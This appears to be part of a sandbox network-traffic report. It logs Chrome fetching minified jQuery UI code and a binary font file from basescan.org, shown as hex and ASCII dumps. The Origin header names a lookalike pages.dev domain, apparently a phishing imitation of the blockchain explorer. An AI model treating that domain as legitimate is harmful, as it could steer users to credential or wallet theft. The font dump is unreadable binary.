                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 69 6e 2e 6a 73 2c 20 6a 71 75 65 72 79 2d 31 2d 37 2e 6a 73 2c 20 6b 65 79 63 6f 64 65 2e 6a 73 2c 20 6c 61 62 65 6c 73 2e 6a 73 2c 20 73 63 72 6f 6c 6c 2d 70 61 72 65 6e 74 2e 6a 73 2c 20 74 61 62 62 61 62 6c 65 2e 6a 73 2c 20 75 6e 69 71 75 65 2d 69 64 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 61 63 63 6f 72 64 69 6f 6e 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 62 75 74 74 6f 6e 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 63 68 65 63 6b 62 6f 78 72 61 64 69 6f 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 63 6f 6e 74 72 6f 6c 67 72 6f 75 70 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 61 74 65 70 69 63 6b 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 69 61 6c 6f 67 2e 6a 73 2c 20 77 69 64 67 65 74
                                                                                                                                                                                                                                              Data Ascii: in.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widget
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 74 68 69 73 2e 5f 75 6e 73 65 6c 65 63 74 61 62 6c 65 43 6c 61 73 73 3d 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 75 6e 73 65 6c 65 63 74 61 62 6c 65 22 2c 74 68 69 73 2e 5f 63 75 72 72 65 6e 74 43 6c 61 73 73 3d 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 63 75 72 72 65 6e 74 2d 64 61 79 22 2c 74 68 69 73 2e 5f 64 61 79 4f 76 65 72 43 6c 61 73 73 3d 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 64 61 79 73 2d 63 65 6c 6c 2d 6f 76 65 72 22 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 3d 5b 5d 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 22 5d 3d 7b 63 6c 6f 73 65 54 65 78 74 3a 22 44 6f 6e 65 22 2c 70 72 65 76 54 65 78 74 3a 22 50 72 65 76 22 2c 6e 65 78 74 54 65 78 74 3a 22 4e 65 78 74 22 2c 63 75 72 72 65 6e 74 54 65 78 74 3a 22 54 6f 64 61 79 22 2c
                                                                                                                                                                                                                                              Data Ascii: this._unselectableClass="ui-datepicker-unselectable",this._currentClass="ui-datepicker-current-day",this._dayOverClass="ui-datepicker-days-cell-over",this.regional=[],this.regional[""]={closeText:"Done",prevText:"Prev",nextText:"Next",currentText:"Today",
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 2c 61 75 74 6f 53 69 7a 65 3a 21 31 2c 64 69 73 61 62 6c 65 64 3a 21 31 7d 2c 74 2e 65 78 74 65 6e 64 28 74 68 69 73 2e 5f 64 65 66 61 75 6c 74 73 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 22 5d 29 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 2e 65 6e 3d 74 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 22 5d 29 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 65 6e 2d 55 53 22 5d 3d 74 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 2e 65 6e 29 2c 74 68 69 73 2e 64 70 44 69 76 3d 6e 28 74 28 22 3c 64 69 76 20 69 64 3d 27 22 2b 74 68 69 73 2e 5f 6d 61 69 6e 44 69 76 49 64 2b 22 27 20 63 6c 61 73 73 3d 27 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 75 69 2d 77 69 64 67 65 74 20 75 69
                                                                                                                                                                                                                                              Data Ascii: ,autoSize:!1,disabled:!1},t.extend(this._defaults,this.regional[""]),this.regional.en=t.extend(!0,{},this.regional[""]),this.regional["en-US"]=t.extend(!0,{},this.regional.en),this.dpDiv=n(t("<div id='"+this._mainDivId+"' class='ui-datepicker ui-widget ui
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 31 22 3b 76 61 72 20 68 3d 30 2c 6c 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 3b 74 2e 63 6c 65 61 6e 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 73 2c 6e 2c 6f 3b 66 6f 72 28 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 6e 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 74 72 79 7b 73 3d 74 2e 5f 64 61 74 61 28 6e 2c 22 65 76 65 6e 74 73 22 29 2c 73 26 26 73 2e 72 65 6d 6f 76 65 26 26 74 28 6e 29 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 28 22 72 65 6d 6f 76 65 22 29 7d 63 61 74 63 68 28 61 29 7b 7d 65 28 69 29 7d 7d 28 74 2e 63 6c 65 61 6e 44 61 74 61 29 2c 74 2e 77 69 64 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 73 29 7b 76 61 72 20 6e 2c 6f 2c 61 2c 72 3d 7b 7d 2c 68
                                                                                                                                                                                                                                              Data Ascii: 1";var h=0,l=Array.prototype.slice;t.cleanData=function(e){return function(i){var s,n,o;for(o=0;null!=(n=i[o]);o++)try{s=t._data(n,"events"),s&&s.remove&&t(n).triggerHandler("remove")}catch(a){}e(i)}}(t.cleanData),t.widget=function(e,i,s){var n,o,a,r={},h
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 73 2e 70 75 73 68 28 6f 29 2c 74 2e 77 69 64 67 65 74 2e 62 72 69 64 67 65 28 65 2c 6f 29 2c 6f 7d 2c 74 2e 77 69 64 67 65 74 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 69 2c 73 2c 6e 3d 6c 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 6f 3d 30 2c 61 3d 6e 2e 6c 65 6e 67 74 68 3b 61 3e 6f 3b 6f 2b 2b 29 66 6f 72 28 69 20 69 6e 20 6e 5b 6f 5d 29 73 3d 6e 5b 6f 5d 5b 69 5d 2c 6e 5b 6f 5d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 26 26 28 65 5b 69 5d 3d 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 73 29 3f 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 5b 69 5d 29 3f 74 2e 77 69 64 67 65 74 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 5b 69 5d 2c 73 29 3a 74 2e
                                                                                                                                                                                                                                              Data Ascii: s.push(o),t.widget.bridge(e,o),o},t.widget.extend=function(e){for(var i,s,n=l.call(arguments,1),o=0,a=n.length;a>o;o++)for(i in n[o])s=n[o][i],n[o].hasOwnProperty(i)&&void 0!==s&&(e[i]=t.isPlainObject(s)?t.isPlainObject(e[i])?t.widget.extend({},e[i],s):t.
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 61 62 6c 65 3d 74 28 29 2c 74 68 69 73 2e 66 6f 63 75 73 61 62 6c 65 3d 74 28 29 2c 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 3d 7b 7d 2c 69 21 3d 3d 74 68 69 73 26 26 28 74 2e 64 61 74 61 28 69 2c 74 68 69 73 2e 77 69 64 67 65 74 46 75 6c 6c 4e 61 6d 65 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 6f 6e 28 21 30 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 7b 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 74 61 72 67 65 74 3d 3d 3d 69 26 26 74 68 69 73 2e 64 65 73 74 72 6f 79 28 29 7d 7d 29 2c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 3d 74 28 69 2e 73 74 79 6c 65 3f 69 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3a 69 2e 64 6f 63 75 6d 65 6e 74 7c 7c 69 29 2c 74 68 69 73 2e 77 69 6e 64 6f 77 3d 74 28 74 68 69 73 2e 64
                                                                                                                                                                                                                                              Data Ascii: able=t(),this.focusable=t(),this.classesElementLookup={},i!==this&&(t.data(i,this.widgetFullName,this),this._on(!0,this.element,{remove:function(t){t.target===i&&this.destroy()}}),this.document=t(i.style?i.ownerDocument:i.document||i),this.window=t(this.d
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 69 6f 6e 73 5b 65 5d 3f 6e 75 6c 6c 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 65 5d 3b 61 5b 65 5d 3d 69 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 73 28 61 29 2c 74 68 69 73 7d 2c 5f 73 65 74 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 66 6f 72 28 65 20 69 6e 20 74 29 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 28 65 2c 74 5b 65 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 5f 73 65 74 4f 70 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 22 63 6c 61 73 73 65 73 22 3d 3d 3d 74 26 26 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 43 6c 61 73 73 65 73 28 65 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 74 5d 3d 65 2c 22 64 69 73 61 62 6c 65 64 22 3d 3d 3d 74 26 26 74 68
                                                                                                                                                                                                                                              Data Ascii: ions[e]?null:this.options[e];a[e]=i}return this._setOptions(a),this},_setOptions:function(t){var e;for(e in t)this._setOption(e,t[e]);return this},_setOption:function(t,e){return"classes"===t&&this._setOptionClasses(e),this.options[t]=e,"disabled"===t&&th
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 63 6b 43 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 2e 65 61 63 68 28 69 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 73 2c 6e 29 7b 2d 31 21 3d 3d 74 2e 69 6e 41 72 72 61 79 28 65 2e 74 61 72 67 65 74 2c 6e 29 26 26 28 69 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 5b 73 5d 3d 74 28 6e 2e 6e 6f 74 28 65 2e 74 61 72 67 65 74 29 2e 67 65 74 28 29 29 29 7d 29 7d 2c 5f 72 65 6d 6f 76 65 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 6f 67 67 6c 65 43 6c 61 73 73 28 74 2c 65 2c 69 2c 21 31 29 7d 2c 5f 61 64 64 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65
                                                                                                                                                                                                                                              Data Ascii: ckClassesElement:function(e){var i=this;t.each(i.classesElementLookup,function(s,n){-1!==t.inArray(e.target,n)&&(i.classesElementLookup[s]=t(n.not(e.target).get()))})},_removeClass:function(t,e,i){return this._toggleClass(t,e,i,!1)},_addClass:function(t,e
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 68 6f 76 65 72 61 62 6c 65 3d 74 68 69 73 2e 68 6f 76 65 72 61 62 6c 65 2e 61 64 64 28 65 29 2c 74 68 69 73 2e 5f 6f 6e 28 65 2c 7b 6d 6f 75 73 65 65 6e 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 6e 75 6c 6c 2c 22 75 69 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 7d 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 72 65 6d 6f 76 65 43 6c 61 73 73 28 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 6e 75 6c 6c 2c 22 75 69 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 7d 7d 29 7d 2c 5f 66 6f 63 75 73 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 66 6f 63 75 73 61 62 6c 65 3d 74 68 69 73 2e
                                                                                                                                                                                                                                              Data Ascii: hoverable=this.hoverable.add(e),this._on(e,{mouseenter:function(e){this._addClass(t(e.currentTarget),null,"ui-state-hover")},mouseleave:function(e){this._removeClass(t(e.currentTarget),null,"ui-state-hover")}})},_focusable:function(e){this.focusable=this.


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              73192.168.2.549813104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC707OUTGET /assets/vendor/font-awesome/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff2
                                                                                                                                                                                                                                              Content-Length: 348036
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59656
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRpICzrM5o%2BRJKdePyVZZERE9er%2FnriT5VtMfPeCjn2Zr0ac4Oal0VyvKX7A%2BE56Td086TV2057wqgJhLutDRCbXMxi0WCzdR0jQ0dmjUXkXNPiST07LB3nNwRxWtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d23de04406-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC561INData Raw: 77 4f 46 32 00 01 00 00 00 05 4f 84 00 0a 00 00 00 0e 4e 77 00 05 4f 39 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 e6 48 00 81 90 78 ca b6 b5 10 cb e6 4c 05 87 61 07 20 a5 ff 7f 95 81 b2 db 01 10 15 38 0f 00 00 b5 f5 f7 e1 8c 24 b5 d9 c3 6b 06 30 4c 0f 00 00 f5 e6 3e 04 54 55 55 55 35 23 21 b0 43 55 03 00 ff 1f fc e8 27 3f fb c5 af 7e f3 bb 3f fc e9 2f 7f fb c7 bf fe e3 bf fe e7 ff fe 6b 60 30 ee 06 80 30 2d 56 9b dd e1 74 b9 3d 5e 9f df f0 df ff 7e 7d ee 53 dd 1f f8 7e a2 9e 1b b6 91 40 35 2a c0 e4 a3 a8 02 6e 56 74 8c 8c 1a 7f d7 d8 10 d9 44 d8 8f d3 f0 5f f9 e1 ff bd 4d c1 55 89 e4 a6 f7 4c 5f b3 02 fc 49 e7 65 21 98 c8 86 f1 2a e6 8c 52 5e 2c 97 52 60 7e 68 47 cd 1b 93 7f cf 3c e8 de 68 2a b0 94
                                                                                                                                                                                                                                              Data Ascii: wOF2ONwO96$ `HxLa 8$k0L>TUUU5#!CU'?~?/k`00-Vt=^~}S~@5*nVtD_MUL_Ie!*R^,R`~hG<h*
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: b9 9c 2c 50 4a e0 c3 6c 4a 94 5e d1 05 e2 29 10 69 fe fe 9d be dd 73 25 5d 10 5d 81 25 d9 96 03 46 d9 ef c5 cf 56 ec d8 e1 75 29 d0 14 dc 64 1a e8 66 de a6 ec e5 12 5b 0b c4 e9 12 ff 01 7a 81 38 5f 0b 00 ce cf f3 96 ce 7f e7 96 fa ee bd ef f5 79 d3 fa 6a 77 b5 33 3b 6d d5 47 b2 2c cb 05 7b 5d b1 0d c1 4b 31 08 30 46 80 09 06 51 96 62 70 82 01 a5 9b 92 fc a5 b5 7c a7 74 ca a6 75 ff ce 27 4d e9 e4 57 a7 b5 d1 cf f3 9a f3 ff f7 da a7 ec 53 f7 29 4d ea 47 3a 23 1d 4d d1 8c ce 68 a4 33 e3 c1 f6 71 1f e3 80 85 0d c6 a6 0a 62 13 83 49 22 9a 43 0d ca 25 85 f2 81 21 09 60 48 53 c2 cf c3 24 79 f9 93 e4 25 40 ca 8d 92 7e bb 93 4e da d7 ed dc ee 9f f2 49 3d f3 f3 64 39 fd ef cf fc ff e7 cf 9f f9 53 da 6e 9f 2d ed ea ce ed ed ee e9 9a 56 fd 84 da a9 34 10 70 14 81 e8
                                                                                                                                                                                                                                              Data Ascii: ,PJlJ^)is%]]%FVu)df[z8_yjw3;mG,{]K10FQbp|tu'MWS)MG:#Mh3qbI"C%!`HS$y%@~NI=d9Sn-V4p
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: f8 92 39 52 50 c6 3b 03 06 4c c2 95 78 4f b6 af 3e 34 e0 ff ea e3 88 c5 e0 07 71 9e f4 c5 be 5d 4a bf 0c 9d 97 33 8d f5 29 e0 e3 bc ec 4c 4f 75 94 e5 5d 65 47 5c 14 39 5e 93 e7 a4 af 29 8f 4e c3 8e 57 47 5d ed f4 a1 4f c4 c3 bd c9 73 83 79 39 28 16 5b 3d 56 21 bb e8 65 1d a1 a5 a5 8f b5 09 ed df 73 1d 88 dd 75 65 7b 1c a7 f2 90 37 1f 97 1c ac 03 97 f4 ff 60 1e 2b 4e 8e b5 81 6c eb f8 ce d6 07 f1 8b 39 cc 96 f7 da 30 d8 50 9d e8 e5 3b 60 20 d8 d0 23 b4 67 08 8e ee 3f f7 e5 05 fc 8f fd b9 75 3e 1b e6 9d ea d3 86 6c b9 b4 cf 0c 1b 5d 83 3e cc c2 e1 75 cf 7c 58 9e ce 0a 6f 66 cd c1 17 71 fd ff eb 39 1c ef 63 db 2b 8b 3d e5 f0 eb f4 e0 ca 43 e4 2b ee 8b b6 e0 f1 78 07 e4 50 2d d3 8e 4f 60 7c 6a c5 4a 9e 1f d6 fb 52 6d 8d 8d 23 7e a2 79 28 e7 81 4d b1 75 94 75
                                                                                                                                                                                                                                              Data Ascii: 9RP;LxO>4q]J3)LOu]eG\9^)NWG]Osy9([=V!esue{7`+Nl90P;` #g?u>l]>u|Xofq9c+=C+xP-O`|jJRm#~y(Muu
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 63 da b1 39 c7 b8 16 cc e2 2a 74 2e 39 3e ee 70 cb 40 27 43 e4 08 05 fa 95 e7 47 56 4f b9 ea b0 28 4e d0 9d 9d 87 18 b7 a3 39 d5 ba 99 9a 3d b6 71 c6 c6 fc b5 0d 7f 2c 63 f2 3d ab 8d 8b 43 89 e3 14 63 fd f9 03 ee 44 cb ae fd 34 c1 8b d0 60 ba e9 02 36 5d 3b dd 3b 40 86 e4 77 cc 5d 97 47 ee 35 30 c6 a4 bd b3 ae 78 dd 30 32 f5 2a cc d8 79 3c 97 1d 3e 93 6d 33 11 2b dc a7 17 ef eb 59 e7 c6 d3 ef 18 73 80 77 c7 07 78 ea c8 56 5a 74 0b df b3 7b e7 ae fc e4 5d d8 a1 e5 e0 b4 ce ce aa 78 46 3f a9 6b 0a cc 46 3b c8 19 24 66 cb 3a 74 1e fc 27 13 ec 78 09 a8 76 69 ee 52 ad 0f 08 6d f1 67 2b 3b 74 cb 3a e4 7b ec 35 a7 fc 4a 9c 6d 63 1f 81 0d f1 9d ed 30 77 f7 6d 64 e8 13 4f 5a da 4d 0e 54 47 b9 72 da 21 3e ec 52 f5 0a 98 fc be c5 e2 37 66 db b8 23 6d 83 ef e0 1d 78
                                                                                                                                                                                                                                              Data Ascii: c9*t.9>p@'CGVO(N9=q,c=CcD4`6];;@w]G50x02*y<>m3+YswxVZt{]xF?kF;$f:t'xviRmg+;t:{5Jmc0wmdOZMTGr!>R7f#mx
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: a1 1f 22 52 44 8b 24 91 2c 8a 88 a2 a2 84 58 2f 36 8b 2d 62 ab d8 2e f6 8b c3 e2 84 74 64 11 39 5b ce 91 73 e5 3c 39 5f 2e 90 8b e4 7a b9 41 6e 94 9b e4 51 79 4c 9e 97 4f e5 33 27 c0 09 77 22 9c 04 27 c5 29 e5 9c 75 ce 29 3f e5 af 12 54 a2 4a 57 1e 95 a1 b4 5a a2 2e ab 57 ea b5 7a a7 de ab 8f ea 93 fa a2 7e aa 5f ea 8f fa 9f 76 c2 5d ed 6e 77 f7 ba 07 dd cb ee 15 f7 8f fb 17 04 1f f8 c1 1f 59 11 8e 68 24 43 c0 81 82 8b 0c 64 47 4e e4 42 61 14 41 29 94 46 59 34 45 33 34 47 0b b4 44 2b b4 46 3b 74 40 47 f4 c5 50 0c c3 48 8c c6 18 8c c5 38 8c c7 04 cc c3 7c 2c c4 62 2c c1 32 ac c6 1a ac c5 3a ac c7 06 6c c4 26 6c c6 16 6c c5 36 ec c6 5e 9c c0 49 9c c7 05 5c c4 63 bc c4 2b bc c6 47 fc c0 4f fc c6 3f 26 f6 65 7f 0e e0 60 0e e1 50 ce c4 99 39 1b 87 73 04 47 72
                                                                                                                                                                                                                                              Data Ascii: "RD$,X/6-b.td9[s<9_.zAnQyLO3'w"')u)?TJWZ.Wz~_v]nwYh$CdGNBaA)FY4E34GD+F;t@GPH8|,b,2:l&ll6^I\c+GO?&e`P9sGr
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: ff 69 7f 1d a4 a3 75 b2 ce d4 39 da d1 56 0f b8 53 dd 19 ee 41 f7 88 fb d9 fd e2 7e 75 7d dc 74 37 d3 ad 34 a3 cc 66 73 d5 dc 36 f7 cc 43 f3 d4 bc 34 6f cd 7b e3 67 02 4c a4 49 36 05 a6 d8 d4 99 06 fd e6 9e 64 f7 db 23 f6 8b fd 63 23 6c a4 4d b7 f9 b6 ce 36 da 26 db ea 79 5e 8d 57 05 2f 7f 37 79 09 a0 93 0e 3e c2 87 f9 10 1f e4 03 bc 9f f7 f1 6e 5e cb ab 79 15 af 04 e0 15 bc 9c 97 f1 52 5e c2 8b 01 78 11 33 13 2f e0 f9 3c 8f a7 f3 54 9e c2 93 79 2c 8f e1 91 3c 8c 81 06 a9 9f 2c 19 72 49 51 0f 75 53 17 75 50 3b b5 51 2b b5 50 33 35 51 23 35 50 3d 00 d5 01 50 2d d5 00 50 35 00 55 51 25 95 51 09 15 53 11 15 52 01 e5 53 2e 65 53 26 65 50 1a 25 51 22 25 50 3c c5 51 34 45 50 18 85 52 88 20 00 b1 10 40 2c 10 f3 01 c4 3c 00 31 17 00 40 cc 06 10 b3 04 02 88 19 db
                                                                                                                                                                                                                                              Data Ascii: iu9VSA~u}t74fs6C4o{gLI6d#c#lM6&y^W/7y>n^yR^x3/<Ty,<,rIQuSuP;Q+P35Q#5P=P-P5UQ%QSRS.eS&eP%Q"%P<Q4EPR @,<1@
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 4b 6a 29 ad a0 d5 b5 8e b6 d1 f6 da 45 7b 6b 5f 1d a9 63 74 92 4e d6 29 3a 55 a7 e9 74 9d a1 33 75 96 ce d6 39 3a 57 d7 e9 06 dd ac 5b 74 9b ee d6 3d ba 57 f7 e9 31 3d a1 27 f5 ba de d4 5b 7a 5b ef e8 3d 7d 59 5f d5 d7 f4 2d 7d 47 3f d4 8f f4 33 fd 42 bf d3 df 4c 92 89 99 ac 26 61 9c 29 62 8a 9a e2 a6 84 29 69 4a 99 ca a6 8a a9 6a aa 99 ea a6 96 a9 63 ea 9a 7a a6 be 69 68 3a 98 6e a6 bb 19 68 06 9b 49 66 9a 99 6b 16 99 25 66 99 59 61 56 99 dd e6 b8 b9 63 1e 9a 9f bd 1a 5e 3d af be d7 c0 6b e8 35 f2 1a 7b 4d bc 96 5e 5b 6f a2 77 df 7b e0 7d 61 cb da 4a b6 95 ed 65 7b db 3e 76 9c 9d 6c 17 d9 8d 76 af dd 6f 0f d8 a3 f6 98 bd 68 ef d9 e7 f6 25 fb 99 fd cb 8f f9 d9 fc 1c 7e e4 d7 f4 db fb 33 fc 3d fe 21 ff 98 7f c9 bf e9 df f3 1f fa 5f fb df a4 d4 4b 19 94 32
                                                                                                                                                                                                                                              Data Ascii: Kj)E{k_ctN):Ut3u9:W[t=W1='[z[=}Y_-}G?3BL&a)b)iJjczih:nhIfk%fYaVc^=k5{M^[ow{}aJe{>vlvoh%~3=!_K2
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: d1 b7 24 6d 19 7d 4b d3 b7 36 6d 3b d0 b7 2e 7d 1b d2 76 20 7d 1b d3 b7 3d 6d 87 d1 b7 23 8d 40 db c9 34 32 26 56 5f a2 51 a5 31 83 f6 19 34 7a 69 cc 41 fb 2a 34 e6 52 61 fb 9a 34 e6 a5 b1 2c ed 6b d1 58 9e c6 1b 73 f1 25 8d b7 68 bc 4d fb 77 34 3e 45 ed 3f d0 f8 42 ed 3f d2 e8 2b 68 8f 34 0a 1a df d2 9e 68 fc a4 82 f6 bf 68 fc 42 e3 37 da ff a6 f1 97 26 b6 ff 47 e3 3f 8a 4e da ff a7 08 14 19 1d 81 a2 9f 4e e4 1d 55 8a 81 14 43 e9 e8 a2 18 41 31 8a 8e 01 14 63 28 c6 d1 31 98 62 02 c5 44 3a 86 51 4c a1 98 46 c7 08 8a 19 14 bd 74 8c a6 98 8d 62 2e 3a c6 51 cc 43 31 2f 1d 93 29 16 a0 58 82 8e a9 14 4b 51 6c 41 c7 ac 14 5b 51 7c 48 c7 2a 14 1f d3 1c 40 c7 33 34 07 d1 5c 88 8e 3f 68 2e 42 73 25 3a a7 d0 5c 85 e6 85 74 ce 45 f3 62 9a d8 79 04 cd 4b 69 5e 41 e7
                                                                                                                                                                                                                                              Data Ascii: $m}K6m;.}v }=m#@42&V_Q14ziA*4Ra4,kXs%hMw4>E?B?+h4hhB7&G?NNUCA1c(1bD:QLFtb.:QC1/)XKQlA[Q|H*@34\?h.Bs%:\tEbyKi^A
